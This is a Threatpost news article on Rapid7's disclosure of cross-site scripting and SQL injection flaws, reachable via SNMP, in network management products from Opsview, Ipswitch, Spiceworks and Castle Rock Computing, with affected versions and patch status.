Subscribe to our Threatpost Today newsletter

Join thousands of people who receive the latest breaking cybersecurity news every day.

The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.

*

*

I agree to my personal data being stored and used to receive the newsletter

*

I agree to accept information and occasional commercial offers from Threatpost partners

The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.

Critical Flaws Found in Network Management Systems

Rapid7 has reported and disclosed a half-dozen XSS and SQL injection flaws in popular network management systems, all of which can be reached via SNMP.

Update Four leading network management system providers are busying patching and preparing fixes for a half-dozen critical cross-site scripting and SQL injection vulnerabilities disclosed Wednesday by Rapid7.

Two Three of the affected vendors, Spiceworks, Ipswitch and Opsview, have already patched their respective products, while Castle Rock Computing has yet to set a timeline for the availability of patches.

These management planes provide enterprises with a view into network activity and performance, and hackers with an attractive attack vector. Access to a management plane such as these, for example, would be invaluable in mapping a network, looking for pivot points to other systems and identifying existing vulnerabilities in anything managed by the system.

“The fact that many of these protocols are delivered over SNMP is also very interesting; too often, designers of management software, which is intended for internal, use don’t consider the insider threat,” said Tod Beardsley, principal security research manager at Rapid7. Rapid7’s Deral Heiland and indepdenent security researcher Matthew Kienow are credited with finding the vulnerabilities.

SNMP is the simple network management protocol and is the protocol over which most network management systems communicate configuration changes and other commands to devices such as routers, servers, workstations and more.

Opsview was the first to patch, releasing a fix on Nov. 6 for stored and reflected XSS vulnerabilities on the Opsview web application server and client respectively affecting version 4.6.3. Exploits via SNMP traps and the SNMP agent could lead to code injection and execution in the victim’s browser; an authenticated browser session could lead to further attacks, Rapid7 said.

Ipswitch, meanwhile, on Wednesday patched persistent XSS and SQL injection flaws in its WhatsUpGold network management system. Attackers would require authentication to exploit the SQL injection bug, while the cross-site scripting vulnerability can be attacked without it. Versions 16.2.6 and 16.3.1 are affected, Rapid7 said.

In exploiting the persistent XSS bug, an attacker would be able to inject JavaScript into a number of fields, which when viewed by WhatsUpGold, will executed under the privileges of the user and allow an attacker to modify settings, steal data or attack the host if configured with SNMP.

The SQL injection bug, if the attacker is authenticated, could allow an attacker to steal from a database using tools such as SQLMAP.

Castle Rock Computing’s SNMPc Enterprise 9 and a web-based reporting and monitoring tool called SNMPc OnLine 12.1 is vulnerable to a persistent cross-site scripting vulnerability that can be exploited without authentication. Again, as with the Ipswitch XSS bug, an attacker could inject JavaScript into fields and once the NMS product views those fields, the code executes.

These flaws were discovered Sept. 14 and disclosed to the DHS-sponsored CERT at Carnegie Mellon University, and have yet to be addressed by the vendor.

This article was updated to include clarifications regarding Ipswitch’s patches released Dec. 16.

Authors

Threatpost

InfoSec Insider Post

InfoSec Insider content is written by a trusted community of Threatpost cybersecurity subject matter experts. Each contribution has a goal of bringing a unique voice to important cybersecurity topics. Content strives to be of the highest quality, objective and non-commercial.

Sponsored

Sponsored Post

Sponsored Content is paid for by an advertiser. Sponsored content is written and edited by members of our sponsor community. This content creates an opportunity for a sponsor to provide insight and commentary from their point-of-view directly to the Threatpost audience. The Threatpost editorial team does not participate in the writing or editing of Sponsored Content.